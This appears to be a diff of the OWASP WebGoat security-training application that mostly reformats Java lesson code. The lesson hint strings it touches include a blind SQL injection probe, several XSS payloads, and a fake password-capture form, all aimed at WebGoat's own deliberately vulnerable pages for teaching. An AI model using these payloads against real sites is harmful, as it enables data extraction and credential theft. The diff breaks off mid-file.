The backend database is HSQLDB. Keep that in mind if you research SQL functions " - + "on the Internet since different databases use some different functions and syntax."); - hints.add("This is the code for the query being built and issued by WebGoat:
" - + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); - hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " - + "You will need to make use of the following SQL functions: " - + "
SELECT - query for your target data and get a string " - + "
substr(string, start, length) - returns a " - + "substring of string starting at the start character and going for length characters " - + "
ascii(string) will return the ascii value of the first character in string " - + "
> and < - once you have a character's value, compare it to a choosen one"); - hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM - + " less than 'M' (ascii 77)? " - + "
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM - + ") , 1 , 1) ) < 77 ); " - + "
If you get back that account number is valid, then yes. If get back that the number is" - + "invalid then answer is no."); - hints.add("Another example: is the second character of the first_name of userid " - + TARGET_ACCT_NUM - + " greater than 'm' (ascii 109)? " - + "
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 2 , 1) ) > 109 ); " - + "
If you get back that account number is valid, then yes. If get back that the number is " - + "invalid then answer is no."); + hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Create a SQL statement that you can use as a true/false test and then " + + "select the first character of the target element and do a start narrowing " + + "down the character using > and <" + + "
The backend database is HSQLDB. Keep that in mind if you research SQL functions " + + "on the Internet since different databases use some different functions and syntax."); + hints.add("This is the code for the query being built and issued by WebGoat:
" + + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " + + "You will need to make use of the following SQL functions: " + + "
SELECT - query for your target data and get a string " + + "
substr(string, start, length) - returns a " + + "substring of string starting at the start character and going for length characters " + + "
ascii(string) will return the ascii value of the first character in string " + + "
> and < - once you have a character's value, compare it to a choosen one"); + hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM + + " less than 'M' (ascii 77)? " + + "
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM + + ") , 1 , 1) ) < 77 ); " + + "
If you get back that account number is valid, then yes. If get back that the number is" + + "invalid then answer is no."); + hints.add("Another example: is the second character of the first_name of userid " + TARGET_ACCT_NUM + + " greater than 'm' (ascii 109)? " + + "
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM + + ") , 2 , 1) ) > 109 ); " + + "
If you get back that account number is valid, then yes. If get back that the number is " + + "invalid then answer is no."); return hints; } @@ -233,7 +230,7 @@ public class BlindSqlInjection extends LessonAdapter super.handleRequest(s); } catch (Exception e) { - //System.out.println("Exception caught: " + e); + // System.out.println("Exception caught: " + e); e.printStackTrace(System.out); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java index e661e06a3..290fab958 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java @@ -68,7 +68,7 @@ public class CSRF extends LessonAdapter private final static int TITLE_COL = 2; private static int count = 1; private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted - // message + // message private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") .setBorder(0).setHspace(0).setVspace(0); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java index 063b57420..87a14c8a6 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java @@ -40,7 +40,7 @@ public class Category implements Comparable { public final static Category INTRODUCTION = new Category("Introduction", new Integer(5)); - + public final static Category GENERAL = new Category("General", new Integer(100)); public final static Category ACCESS_CONTROL = new Category("Access Control Flaws", new Integer(200)); @@ -64,7 +64,7 @@ public class Category implements Comparable public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200)); public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300)); - + public final static Category INSECURE_CONFIGURATION = new Category("Insecure Configuration", new Integer(1400)); public final static Category INSECURE_STORAGE = new Category("Insecure Storage", new Integer(1500)); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java index 924767fb8..2b06a26ab 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java @@ -282,7 +282,6 @@ public class Challenge2Screen extends SequentialLessonAdapter */ /* * (non-Javadoc) - * * @see lessons.LessonAdapter#doStage3(session.WebSession) */ protected Element doStage3(WebSession s) throws Exception @@ -631,7 +630,7 @@ public class Challenge2Screen extends SequentialLessonAdapter t.setBorder(1); } - String[] colWidths = new String[]{"55", "110", "260", "70"}; + String[] colWidths = new String[] { "55", "110", "260", "70" }; TR tr = new TR(); tr.addElement(new TH().addElement("Protocol").setWidth(colWidths[0])); tr.addElement(new TH().addElement("Local Address").setWidth(colWidths[1])); @@ -678,7 +677,7 @@ public class Challenge2Screen extends SequentialLessonAdapter tr = new TR(); TD td; StringTokenizer tokens = new StringTokenizer(lines.nextToken(), "\t "); - while (tokens.hasMoreTokens() && columnCount <4) + while (tokens.hasMoreTokens() && columnCount < 4) { td = new TD().setWidth(colWidths[columnCount++]); tr.addElement(td.addElement(tokens.nextToken())); @@ -725,7 +724,7 @@ public class Challenge2Screen extends SequentialLessonAdapter osw.write(message); } catch (Exception e) { - //System.out.println("Couldn't write " + message + " to " + s); + // System.out.println("Couldn't write " + message + " to " + s); e.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java index 804f26fb8..530a74af1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java @@ -95,8 +95,6 @@ public class ClientSideFiltering extends SequentialLessonAdapter t.setID("hiddenEmployeeRecords"); t.setStyle("display: none"); - - workspaceDiv.addElement(t); @@ -334,7 +332,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter hints.add("Stage 1: Use Firebug to find where the information is stored on the client side."); - hints.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); + hints + .add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); hints.add("Stage 1: Look in the last row of the hidden table."); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java index c3bbdf763..20034a318 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java @@ -137,7 +137,7 @@ public class ConcurrencyCart extends LessonAdapter } catch (ParameterNotFoundException pnfe) { - //System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); + // System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); } @@ -154,9 +154,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * PURCHASING PAGE ********************************** - * ********************************************************************* + * PURCHASING PAGE */ private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, @@ -303,9 +301,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * CONFIRMATION PAGE ******************************** - * ********************************************************************* + * CONFIRMATION PAGE */ private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) @@ -420,9 +416,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * SHOPPING PAGE ********************************** - * ********************************************************************* + * SHOPPING PAGE */ private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java index 1260b13b0..96ae2e6da 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java @@ -98,23 +98,25 @@ public class CrossSiteScripting extends GoatHillsFinancial { return Category.XSS; } - - - public String getLessonSolutionFileName(WebSession s) { + + public String getLessonSolutionFileName(WebSession s) + { String solutionFileName = null; String stage = getStage(s); solutionFileName = "/lesson_solutions/Lab XSS/Lab " + stage + ".html"; return solutionFileName; } - + @Override - public String getSolution(WebSession s) { + public String getSolution(WebSession s) + { String src = null; try { - //System.out.println("Solution: " + getLessonSolutionFileName(s)); - src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false); + // System.out.println("Solution: " + getLessonSolutionFileName(s)); + src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false); } catch (IOException e) { s.setMessage("Could not find the solution file"); @@ -123,7 +125,7 @@ public class CrossSiteScripting extends GoatHillsFinancial return src; } - + /** * Gets the hints attribute of the DirectoryScreen object * @@ -148,9 +150,9 @@ public class CrossSiteScripting extends GoatHillsFinancial // Stage 3 - // Stage 4 - hints.add("Stage4: Examine content served in response to form submissions looking for data taken from the form."); + hints + .add("Stage4: Examine content served in response to form submissions looking for data taken from the form."); hints.add("Stage4: There is a class called HtmlEncoder in org.owasp.webgoat.util"); // Stage 5 hints @@ -179,8 +181,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE2.equals(stage)) { - instructions = "Stage 2: Block Stored XSS using Input Validation.
" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + instructions = "Stage 2: Block Stored XSS using Input Validation.
" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + "Implement a fix to block the stored XSS before it can be written to the database. " + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; } @@ -192,8 +194,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE4.equals(stage)) { - instructions = "Stage 4: Block Stored XSS using Output Encoding.
" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + instructions = "Stage 4: Block Stored XSS using Output Encoding.
" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + "Implement a fix to block XSS after it is read from the database. " + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack."; } @@ -205,8 +207,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE6.equals(stage)) { - instructions = "Stage 6: Block Reflected XSS using Input Validation.
" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + instructions = "Stage 6: Block Reflected XSS using Input Validation.
" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + "Implement a fix to block this reflected XSS attack. " + "Repeat step 5. Verify that the attack URL is no longer effective."; } @@ -258,28 +260,28 @@ public class CrossSiteScripting extends GoatHillsFinancial } } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java index 4224c606e..e351aab12 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java @@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { @@ -141,8 +141,8 @@ public class EditProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java index 9623c28e1..1ab4068e1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java @@ -104,11 +104,11 @@ public class FindProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } @@ -171,8 +171,8 @@ public class FindProfile extends DefaultLessonAction .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */ setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id)); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java index 330af3a85..b2e8d0fa8 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java @@ -94,11 +94,11 @@ public class UpdateProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } @@ -111,8 +111,8 @@ public class UpdateProfile extends DefaultLessonAction { // The input validation can be added using a parsing component // or by using an inline regular expression. The parsing component - // is the better solution. - + // is the better solution. + HttpServletRequest request = s.getRequest(); String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); @@ -129,7 +129,6 @@ public class UpdateProfile extends DefaultLessonAction String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE); String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION); - Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java index 80499438b..430c4cb79 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java @@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.apache.ecs.xhtml.html; import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; @@ -16,7 +15,6 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; - import com.sun.corba.se.spi.activation.Server; @@ -92,7 +90,6 @@ public class ViewProfile extends DefaultLessonAction { Employee profile = null; - // Query the database for the profile data of the given employee try { @@ -108,15 +105,15 @@ public class ViewProfile extends DefaultLessonAction // Note: Do NOT get the password field. profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results - .getString("title"), answer_results.getString("phone"), - answer_results.getString("address1"), answer_results.getString("address2"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results .getInt("manager"), answer_results.getString("start_date"), answer_results .getInt("salary"), answer_results.getString("ccn"), answer_results .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { @@ -131,14 +128,13 @@ public class ViewProfile extends DefaultLessonAction return profile; } - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException { // Query the database to determine if this employee has access to this function // Query the database for the profile data of the given employee if "owned" by the given // user - + Employee profile = null; // Query the database for the profile data of the given employee @@ -162,11 +158,10 @@ public class ViewProfile extends DefaultLessonAction .getInt("salary"), answer_results.getString("ccn"), answer_results .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); - /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java index acb8d5d41..62d20ec0a 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java @@ -124,8 +124,8 @@ public class DBCrossSiteScripting extends GoatHillsFinancial String stage = getStage(s); if (STAGE1.equals(stage)) { - instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
"+ - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
" + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " + "Verify that 'Jerry' is affected by the attack. " + "A sample JavaScript snippet you can use is: <SCRIPT>alert('bang!');</SCRIPT>."; @@ -186,28 +186,28 @@ public class DBCrossSiteScripting extends GoatHillsFinancial } } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java index 58ea7f458..d9e3a4f07 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java @@ -129,11 +129,11 @@ public class UpdateProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java index 620c74cd1..890b06c6d 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java @@ -187,28 +187,28 @@ public class DBSQLInjection extends GoatHillsFinancial setCurrentAction(s, ERROR_ACTION); } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java index 5644c59ec..6816a9e5e 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java @@ -82,11 +82,11 @@ public class Login extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java index 08d469d90..3332717dd 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java @@ -61,11 +61,11 @@ public class DOMInjection extends LessonAdapter .setBorder(0).setHspace(0).setVspace(0); private final static String key = "K1JFWP8BSO8HI52LNPQS8F5L01N"; - + public void handleRequest(WebSession s) { try - { + { String userKey = s.getParser().getRawParameter(KEY, ""); String fromAJAX = s.getParser().getRawParameter("from", ""); if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 && userKey.equals(key)) @@ -74,11 +74,10 @@ public class DOMInjection extends LessonAdapter s.getResponse().setHeader("Cache-Control", "no-cache"); PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); - out.print("document.forms[0].SUBMIT.disabled = false;"); out.flush(); out.close(); - return ; + return; } } catch (Exception e) @@ -91,21 +90,19 @@ public class DOMInjection extends LessonAdapter setContent(form); } + protected Element createContent(WebSession s) { - ElementContainer ec = new ElementContainer(); - if (s.getRequest().getMethod().equalsIgnoreCase("POST") ) + if (s.getRequest().getMethod().equalsIgnoreCase("POST")) { makeSuccess(s); } String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; + + " messageDiv.innerHTML = 'Correct licence Key.' " + lineSep + " }" + lineSep + + " catch(err)" + lineSep + " { " + lineSep + " messageDiv.innerHTML = 'Wrong license key.'" + + lineSep + "} " + lineSep + " }}}" + lineSep + "" + lineSep; ec.addElement(new StringElement(script)); ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:"))); @@ -147,7 +139,6 @@ public class DOMInjection extends LessonAdapter t1.addElement(tr); - tr = new TR(); Input b = new Input(); b.setType(Input.SUBMIT); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java index 3c5f7dc35..15bc94ed6 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java @@ -183,13 +183,16 @@ public class DOMXSS extends SequentialLessonAdapter hints.add("Stage 2: Try entering the following: " + "<img src=x onerror=;;alert('XSS') />"); - hints.add("Stage 3: Try entering the following: " + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"); + hints.add("Stage 3: Try entering the following: " + + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"); - hints.add("Stage 4: Try entering the following: " + hints + .add("Stage 4: Try entering the following: " + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"); - hints.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version)."); + hints + .add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version)."); // Attack Strings: //
@@ -201,7 +204,8 @@ public class DOMXSS extends SequentialLessonAdapter
// Please enter your password:+ // pass.value); + // ">Submit
return hints; } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java index 6e06af542..02ea116d0 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java @@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import java.util.regex.Pattern; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; @@ -88,7 +87,7 @@ public class DangerousEval extends LessonAdapter // FIXME: encode output of field2, then s.setMessage( field2 ); ec.addElement(""); - // + // ec.addElement(new HR().setWidth("90%")); ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); @@ -203,7 +202,7 @@ public class DangerousEval extends LessonAdapter ec.addElement(t); ec.addElement(new BR()); ec.addElement(new HR().setWidth("90%")); - + } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java index b65910af8..509c44ef7 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java @@ -66,11 +66,11 @@ public class DeleteProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java index 618f120a3..5de476081 100755 --- 